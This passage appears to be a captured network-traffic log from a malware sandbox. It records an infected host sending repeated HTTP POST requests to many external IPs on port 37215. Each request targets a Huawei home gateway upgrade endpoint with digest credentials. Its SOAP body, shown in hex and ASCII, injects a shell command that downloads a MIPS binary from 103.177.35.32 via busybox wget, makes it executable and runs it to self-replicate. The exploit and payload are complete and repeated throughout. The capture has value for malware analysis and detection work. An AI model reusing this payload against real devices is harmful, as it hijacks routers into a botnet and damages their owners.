                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        913192.168.2.235971041.11.98.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491384983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        914192.168.2.2348806157.209.32.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491391897 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        915192.168.2.235514641.23.26.24937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491396904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        916192.168.2.2335416157.247.52.4837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491404057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        917192.168.2.2335580157.229.141.18037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491410971 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        918192.168.2.2356500197.0.88.14337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491414070 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        919192.168.2.2354294101.46.120.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.514174938 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        920192.168.2.235966641.26.255.7637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.514242887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        921192.168.2.235552641.46.207.19937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.353786945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        922192.168.2.235958441.60.54.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.353810072 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
